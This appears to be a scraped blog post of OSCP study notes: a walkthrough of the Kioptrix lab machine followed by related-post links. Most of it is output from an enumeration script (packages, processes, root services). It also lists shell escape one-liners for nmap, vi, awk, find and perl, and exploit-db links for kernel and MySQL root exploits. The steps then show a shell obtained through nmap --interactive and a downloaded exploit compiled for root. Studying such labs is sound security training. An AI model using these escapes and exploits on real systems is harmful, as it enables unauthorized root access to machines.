lksctp-tools-1.0.2-6.4E.1
lksctp-tools-devel-1.0.2-6.4E.1
lockdev-1.0.1-6.2
lockdev-devel-1.0.1-6.2
logrotate-3.7.1-6.RHEL4
logwatch-5.2.2-2.EL4
lrzsz-0.12.20-19
lsof-4.72-1.4
ltrace-0.4-3.el4
lvm2-2.02.21-5.el4
m4-1.4.1-16
mailcap-2.1.17-1
mailx-8.1.1-37.EL4
make-3.80-6.EL4
MAKEDEV-3.15.2-3
man-1.5o1-10.rhel4
man-pages-1.67-12.EL4
mdadm-1.12.0-2
mgetty-1.1.31-2
mingetty-1.07-3
minicom-2.00.0-19
mkbootdisk-1.5.2-1
mkinitrd-4.2.1.10-1.1
mktemp-1.5-20
mod_perl-1.99_16-4.centos4
mod_python-3.1.3-5.1
mod_ssl-2.0.52-32.ent.centos4
module-init-tools-3.1-0.pre5.3.4
mtools-3.9.9-9
mtr-0.54-10
mt-st-0.8-1
mx-2.0.5-3
MyODBC-2.50.39-25.RHEL4.1
mysql-4.1.22-2.el4
mysqlclient10-3.23.58-4.RHEL4.1
mysql-devel-4.1.22-2.el4
MySQL-python-1.2.1_p2-1.el4.1
mysql-server-4.1.22-2.el4
nano-1.2.4-1
ncurses-5.4-13
ncurses-devel-5.4-13
netconfig-0.8.21-1.1
netdump-0.7.16-10
net-snmp-libs-5.1.2-11.EL4.10
net-tools-1.60-37.EL4.9
NetworkManager-0.3.1-4.el4
newt-0.51.6-9.rhel4
newt-devel-0.51.6-9.rhel4
newt-perl-1.08-7
nfs-utils-1.0.6-80.EL4
nfs-utils-lib-1.0.6-8
nmap-3.70-1
nscd-2.3.4-2.36
nss_db-2.2-29
nss_ldap-226-18
ntp-4.2.0.a.20040617-6.el4
ntsysv-1.3.13.5.EL4-1
numactl-0.6.4-1.39
open-1.4-21
openib-1.1-7
OpenIPMI-1.4.14-1.4E.17
OpenIPMI-libs-1.4.14-1.4E.17
OpenIPMI-tools-1.4.14-1.4E.17
openldap-2.2.13-7.4E
openldap-clients-2.2.13-7.4E
openldap-devel-2.2.13-7.4E
opensm-libs-2.0.0-7
openssh-3.9p1-8.RHEL4.20
openssh-clients-3.9p1-8.RHEL4.20
openssh-server-3.9p1-8.RHEL4.20
openssl-0.9.7a-43.16
openssl-devel-0.9.7a-43.16
oprofile-0.8.1-26
ORBit2-2.12.0-3
pam-0.77-66.21
pam_ccreds-3-3.rhel4.2
pam-devel-0.77-66.21
pam_krb5-2.1.8-1
pam_passwdqc-0.7.5-2
pam_smb-1.1.7-5
pango-1.6.0-9
parted-1.6.19-16.EL
passwd-0.68-10.1
patch-2.5.4-20
patchutils-0.2.30-1
pax-3.0-9
pciutils-2.1.99.test8-3.4
pciutils-devel-2.1.99.test8-3.4
pcmcia-cs-3.2.7-3.5
pcre-4.5-3.2.RHEL4
pdksh-5.2.14-30.3
perl-5.8.5-36.RHEL4
perl-Convert-ASN1-0.18-3
perl-Crypt-SSLeay-0.51-5
perl-DBD-MySQL-2.9004-3.1
perl-DBI-1.40-8
perl-Filter-1.30-6
perl-HTML-Parser-3.35-6
perl-HTML-Tagset-3.03-30
perl-LDAP-0.31-5
perl-libwww-perl-5.79-5
perl-libxml-perl-0.07-30
perl-URI-1.30-4
perl-XML-Dumper-0.71-2
perl-XML-Encoding-1.01-26
perl-XML-Grove-0.46alpha-27
perl-XML-LibXML-1.58-1
perl-XML-LibXML-Common-0.13-7
perl-XML-NamespaceSupport-1.08-6
perl-XML-Parser-2.34-5
perl-XML-SAX-0.12-7
perl-XML-Twig-3.13-6
php-4.3.9-3.26
php-ldap-4.3.9-3.26
php-mysql-4.3.9-3.26
php-pear-4.3.9-3.26
pinfo-0.6.8-7
pkgconfig-0.15.0-3
policycoreutils-1.18.1-4.12
popt-1.9.1-22_nonptl
portmap-4.0-63
ppp-2.4.2-6.4.RHEL4
prelink-0.3.3-0.EL4
procmail-3.22-14
procps-3.2.3-8.6
psacct-6.3.2-39.rhel4
psgml-1.2.5-4
psmisc-21.4-4.1
pstack-1.2-6
pygtk2-2.4.0-1
pygtk2-libglade-2.4.0-1
pyOpenSSL-0.6-1.p23
pyorbit-2.0.1-1
python-2.3.4-14.4
python-devel-2.3.4-14.4
python-elementtree-1.2.6-5.el4.centos
python-ldap-2.0.1-2
python-sqlite-1.1.7-1.2.1
python-urlgrabber-2.9.8-2
pyxf86config-0.3.19-1
PyXML-0.8.3-6
qt-3.3.3-10.RHEL4
quota-3.12-6.el4
rcs-5.7-26
rdate-1.4-2
rdist-6.1.5-38.40.2
readline-4.3-13
readline-devel-4.3-13
redhat-logos-1.1.26-1.centos4.4
redhat-lsb-3.0-8.EL
redhat-menus-3.7.1-2
redhat-rpm-config-8.0.32.1-4
rhnlib-2.1.1-3.el4
rhpl-0.148.5-1
rmt-0.4b39-3.EL4.2
rootfiles-8-1
rpm-4.3.3-22_nonptl
rpm-build-4.3.3-22_nonptl
rpmdb-CentOS-4.5-0.20070506
rpm-devel-4.3.3-22_nonptl
rpm-libs-4.3.3-22_nonptl
rpm-python-4.3.3-22_nonptl
rp-pppoe-3.5-22
rsh-0.17-25.4
rsync-2.6.3-1
samba-client-3.0.10-1.4E.11
samba-common-3.0.10-1.4E.11
schedutils-1.4.0-2
screen-4.0.2-5
sed-4.1.2-6.el4
selinux-policy-targeted-1.17.30-2.145
sendmail-8.13.1-3.2.el4
setarch-1.6-1
setools-2.3-4
setserial-2.17-17
setup-2.5.37-1.3
setuptool-1.17-2
sgml-common-0.6.3-17
shadow-utils-4.0.3-61.RHEL4
shared-mime-info-0.15-10.1.el4
slang-1.4.9-8
slang-devel-1.4.9-8
slocate-2.7-13.el4.6
sox-12.17.5-3
specspo-9.0.92-1.3
splint-3.1.1-4
sqlite-3.3.6-2
squid-2.5.STABLE14-1.4E
statserial-1.1-35
strace-4.5.15-1.el4.1
stunnel-4.05-3
sudo-1.6.7p5-30.1.3
swig-1.3.21-6
symlinks-1.2-22
sysfsutils-1.2.0-1
sysfsutils-devel-1.2.0-1
sysklogd-1.4.1-26_EL
syslinux-2.11-1
sysreport-1.3.15-8
system-config-date-1.7.15-0.RHEL4.3
system-config-httpd-1.3.1-1
system-config-keyboard-1.2.5-1
system-config-language-1.1.8-4
system-config-mouse-1.2.9-1
system-config-network-1.3.22.0.EL.4.2-1
system-config-network-tui-1.3.22.0.EL.4.2-1
system-config-nfs-1.2.8-1
system-config-packages-1.2.23-1
system-config-rootpassword-1.1.6-1
system-config-securitylevel-1.4.19.2-1
system-config-securitylevel-tui-1.4.19.2-1
system-config-services-0.8.15-1
system-config-soundcard-1.2.10-2.EL4
system-config-users-1.2.27-0.EL4.4
system-logviewer-0.9.12-0.2
systemtap-0.5.12-1
systemtap-runtime-0.5.12-1
SysVinit-2.85-34.4
talk-0.17-26
tar-1.14-12.RHEL4
tcl-8.4.7-2
tclx-8.3.5-4
tcpdump-3.8.2-10.RHEL4
tcp_wrappers-7.6-37.2
tcsh-6.13-9.el4.1
telnet-0.17-31.EL4.3
termcap-5.4-3
texinfo-4.7-5.el4.2
time-1.7-25
tk-8.4.7-2
tmpwatch-2.9.1-1
tog-pegasus-2.5.1-2.EL4
tog-pegasus-devel-2.5.1-2.EL4
traceroute-1.4a12-24.EL4.1
ttmkfdir-3.0.9-20.el4
tux-3.2.18-2
tzdata-2007d-1.el4
udev-039-10.15.EL4
umb-scheme-3.2-36.EL4
unix2dos-2.2-24.1
unixODBC-2.2.11-1.RHEL4.1
unzip-5.51-9.EL4.5
up2date-4.5.5-5.centos4
urw-fonts-2.2-6.1
usbutils-0.11-7.RHEL4.1
usermode-1.74-2
usermode-gtk-1.74-2
utempter-0.5.5-5
util-linux-2.12a-16.EL4.25
valgrind-3.1.1-1.EL4
valgrind-callgrind-0.10.1-2.EL4
vconfig-1.8-4
vim-minimal-6.3.046-0.40E.7
vixie-cron-4.1-44.EL4
vsftpd-2.0.1-5.EL4.5
webalizer-2.01_10-25
wget-1.10.2-0.40E
which-2.16-4
wireless-tools-28-0.pre16.3.3.EL4
wireshark-0.99.5-EL4.1
words-3.0-3.2
wpa_supplicant-0.4.9-1.1.el4
wvdial-1.54.0-3
Xaw3d-1.5-24
xdelta-1.1.3-15
xinetd-2.3.13-4.4E.1
xmlsec1-1.2.6-3
xmlsec1-openssl-1.2.6-3
xorg-x11-font-utils-6.8.2-1.EL.18
xorg-x11-libs-6.8.2-1.EL.18
xorg-x11-Mesa-libGL-6.8.2-1.EL.18
xorg-x11-xauth-6.8.2-1.EL.18
xorg-x11-xfs-6.8.2-1.EL.18
ypbind-1.17.2-13
yp-tools-2.8-7
yum-2.4.3-3.el4.centos
zip-2.3-27
zlib-1.2.1.2-1.2
zlib-devel-1.2.1.2-1.2
zsh-4.2.0-4.EL.4.5 [+] Current processes
USER PID START TIME COMMAND
root 1 01:23 0:04 init
root 2 01:23 0:00 [ksoftirqd/0]
root 3 01:23 0:00 [events/0]
root 4 01:23 0:00 [khelper]
root 5 01:23 0:00 [kacpid]
root 82 01:23 0:00 [kblockd/0]
root 83 01:23 0:00 [khubd]
root 100 01:23 0:00 [pdflush]
root 101 01:23 0:00 [pdflush]
root 102 01:23 0:00 [kswapd0]
root 103 01:23 0:00 [aio/0]
root 249 01:23 0:00 [kseriod]
root 482 01:23 0:00 [ata/0]
root 483 01:23 0:00 [ata_aux]
root 498 01:23 0:00 [kjournald]
root 1695 01:24 0:00 udevd
root 1727 01:24 0:00 [shpchpd_event]
root 1812 01:24 0:00 [kauditd]
root 1923 01:24 0:00 [kjournald]
root 2511 01:24 0:00 syslogd
root 2515 01:24 0:00 klogd
rpc 2542 01:24 0:00 portmap
rpcuser 2561 01:24 0:00 rpc.statd
root 2587 01:24 0:00 rpc.idmapd
root 2659 01:24 0:00 /usr/sbin/acpid
root 2720 01:24 0:00 /usr/sbin/sshd
root 2756 01:24 0:00 xinetd
root 2774 01:24 0:00 sendmail:
smmsp 2784 01:24 0:00 sendmail:
root 2794 01:24 0:00 gpm
root 2803 01:24 0:00 crond
xfs 2825 01:24 0:00 xfs
root 2842 01:24 0:00 /usr/sbin/atd
dbus 2851 01:24 0:00 dbus-daemon-1
root 2860 01:24 0:00 hald
root 3115 01:24 0:00 dhclient
root 3118 01:24 0:00 httpd
root 3144 01:24 0:00 /bin/sh
mysql 3197 01:24 0:01 /usr/libexec/mysqld
root 3215 01:24 0:00 /sbin/mingetty
root 3216 01:24 0:00 /sbin/mingetty
root 3217 01:24 0:00 /sbin/mingetty
root 3218 01:24 0:00 /sbin/mingetty
root 3219 01:24 0:00 /sbin/mingetty
root 3220 01:24 0:00 /sbin/mingetty
root 4150 02:29 0:00 cupsd
apache 4388 02:29 0:04 httpd
apache 4393 02:29 0:04 httpd
apache 4395 02:29 0:04 httpd
apache 9499 02:36 0:03 httpd
apache 9519 02:36 0:03 httpd
apache 9532 02:36 0:03 httpd
apache 9533 02:36 0:02 httpd
apache 9536 02:36 0:03 httpd
apache 9537 02:36 0:03 httpd
apache 9538 02:36 0:03 httpd
apache 9539 02:36 0:03 httpd
apache 9543 02:36 0:03 httpd
apache 9544 02:36 0:03 httpd
apache 9562 02:48 0:00 httpd
apache 9563 02:48 0:00 httpd
apache 9564 02:48 0:00 httpd
apache 9565 02:48 0:00 httpd
apache 9569 02:48 0:00 httpd
apache 9574 02:48 0:00 httpd
apache 10155 02:48 0:00 httpd
apache 12251 03:42 0:00 sh
apache 12253 03:42 0:00 bash
apache 12259 03:57 0:00 python
apache 12389 03:57 0:00 sh
sh: apache2: command not found
sh: apache2ctl: command not found
apache 12390 03:57 0:00 ps
apache 12391 03:57 0:00 awk [+] Apache Version and Modules
Server version: Apache/2.0.52
Server built: May 4 2007 06:25:03
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c [+] Apache Config File [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.6.7p5 [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER... root 3217 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 2756 01:24 0:00 xinetd
Possible Related Packages:
xinetd-2.3.13-4.4E.1
root 498 01:23 0:00 [kjournald]
root 102 01:23 0:00 [kswapd0]
root 3219 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 2587 01:24 0:00 rpc.idmapd
root 3144 01:24 0:00 /bin/sh
root 3115 01:24 0:00 dhclient
Possible Related Packages:
dhclient-3.0.1-59.EL4
root 482 01:23 0:00 [ata/0]
root 100 01:23 0:00 [pdflush]
root 3220 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 249 01:23 0:00 [kseriod]
root 103 01:23 0:00 [aio/0]
root 82 01:23 0:00 [kblockd/0]
root 1812 01:24 0:00 [kauditd]
root 5 01:23 0:00 [kacpid]
root 2794 01:24 0:00 gpm
Possible Related Packages:
gpm-1.20.1-71.RHEL4
gpm-devel-1.20.1-71.RHEL4
root 83 01:23 0:00 [khubd]
root 2860 01:24 0:00 hald
root 4150 02:29 0:00 cupsd
root 2515 01:24 0:00 klogd
Possible Related Packages:
sysklogd-1.4.1-26_EL
root 2842 01:24 0:00 /usr/sbin/atd
root 1695 01:24 0:00 udevd
root 2803 01:24 0:00 crond
root 2511 01:24 0:00 syslogd
root 2 01:23 0:00 [ksoftirqd/0]
root 3215 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 101 01:23 0:00 [pdflush]
root 483 01:23 0:00 [ata_aux]
root 2774 01:24 0:00 sendmail:
root 1923 01:24 0:00 [kjournald]
root 3216 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 4 01:23 0:00 [khelper]
root 3218 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 2720 01:24 0:00 /usr/sbin/sshd
root 1727 01:24 0:00 [shpchpd_event]
root 3118 01:24 0:00 httpd
Possible Related Packages:
httpd-2.0.52-32.ent.centos4
httpd-manual-2.0.52-32.ent.centos4
httpd-suexec-2.0.52-32.ent.centos4
system-config-httpd-1.3.1-1
root 1 01:23 0:04 init
Possible Related Packages:
initscripts-7.93.29.EL-1.centos4
mkinitrd-4.2.1.10-1.1
module-init-tools-3.1-0.pre5.3.4
SysVinit-2.85-34.4
root 2659 01:24 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid-1.0.3-2
root 3 01:23 0:00 [events/0] [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... [+] Installed Tools
/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/bin/vi
/usr/bin/nmap
/usr/bin/find
/usr/bin/wget
/usr/bin/ftp [+] Related Shell Escape Sequences... nmap--> --interactive
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";' [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
- 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit [] || http://www.exploit-db.com/exploits/9598 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
- 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
- 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- 2.4/2.6 sock_sendpage() Local Root Exploit [] || http://www.exploit-db.com/exploits/9641 || Language=c
- 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c Finished
=================================================================================================

Start the Nmap in the Kioptrix server.

nmap --interactive

!sh

id

pwd

6. Find the exploit method related to the Linux version 2.6.9-55.EL on the Exploit Database.

https://www.exploit-db.com/exploits/9542

Down load the exploit file to the Kali Linux and copy it to the /var/www/html folder.

Down load the exploit file to the /tmp folder on Kioptirx Server.

Build and execute the exploit file. Ahaaa! We get the root privilege now.

gcc .c -o exploit

7. We can find more confidential information with root privilege.

8. Auto Pentest using the tool such as Metasploit pro is also a good choice.

OSCP Learning Notes - Capstone(1)的更多相关文章

  1. OSCP Learning Notes - Capstone(4)

    SickOS 1.2 Walkthrough Preparation: Down load the SickOS virtual machines from the following website ...

  2. OSCP Learning Notes - Capstone(3)

    DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website ...

  3. OSCP Learning Notes - Capstone(2)

    BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: ...

  4. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  5. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  6. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  7. OSCP Learning Notes - Buffer Overflows(1)

    Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -  ...

  8. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

  9. OSCP Learning Notes - Enumeration(4)

    DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally use ...

随机推荐

  1. 基于web网站项目的性能测试结果分析

    业务背景: 最近公司研发了一款对并发要求比较高的web项目,需要对其压力测试,模拟线上可能存在的问题,这个过程中遇到一些很多问题,这里重新梳理一下思路,希望能给遇到同样问题的小伙伴提供一个参考. 工具 ...

  2. 多语言工作者の十日冲刺<7/10>

    这个作业属于哪个课程 软件工程 (福州大学至诚学院 - 计算机工程系) 这个作业要求在哪里 团队作业第五次--Alpha冲刺 这个作业的目标 团队进行Alpha冲刺--第七天(05.06) 作业正文 ...

  3. 解决 React Native Android:app:validateSigningRelease FAILED 错误

    RN 运行的时候报这个错这咋办:

  4. 蒲公英 · JELLY技术周刊 Vol.12 尤雨溪新作 Vite, 你会支持么?

    「蒲公英」期刊,每周更新,我们专注于挖掘「基础技术.工程化.跨端框架技术.图形编程.服务端开发.桌面开发.人工智能」等多个大方向的业界热点,并加以专业的解读:不仅如此,我们还精选凹凸技术文章,向大家呈 ...

  5. IDEA 2019版本永久破解教程

    1.第一步解压文件(文件网盘下载链接在下面) 2.运行IDEA安装包 3.点击Next 4.注意安装位置文件夹不要带中文-选择好点击Next 5.勾选64-bit launcher,勾选.java,点 ...

  6. node+ajax实战案例(6)

    8.删除客户 8.1.发送id到后台 删除用户信息比较简单,只需要把对应行的id发送到后台就可以了 oTable.onclick = function (ev) { var ev = ev || ev ...

  7. 《UNIX环境高级编程》(APUE) 笔记第九章 - 进程关系

    9 - 进程关系 GitHub 地址 1. 进程组 每个进程除了有一个 进程 ID 外,还属于一个 进程组 .进程组是一个或多个进程的 集合 ,通常,它们是在同一作业中结合起来的,同一进程组中的各进程 ...

  8. 学习 Spring Boot 知识看这一篇就够了

    从2016年因为工作原因开始研究 Spring Boot ,先后写了很多关于 Spring Boot 的文章,发表在技术社区.我的博客和我的公号内.粗略的统计了一下总共的文章加起来大概有六十多篇了,其 ...

  9. BZOJ 4055 Misc

    原题传送门 比较复杂的一道DP. 设两点(i,j)之间最短路为dis[i][j],则 可转化为: 将该式前后分立,可得: 其中,可以单独求出,后面的部分则需要DP. 设为b(x),枚举i,并计算出从i ...

  10. RSS阅读器推荐

    http://www.feeddemon.com/ Windows,Free (完)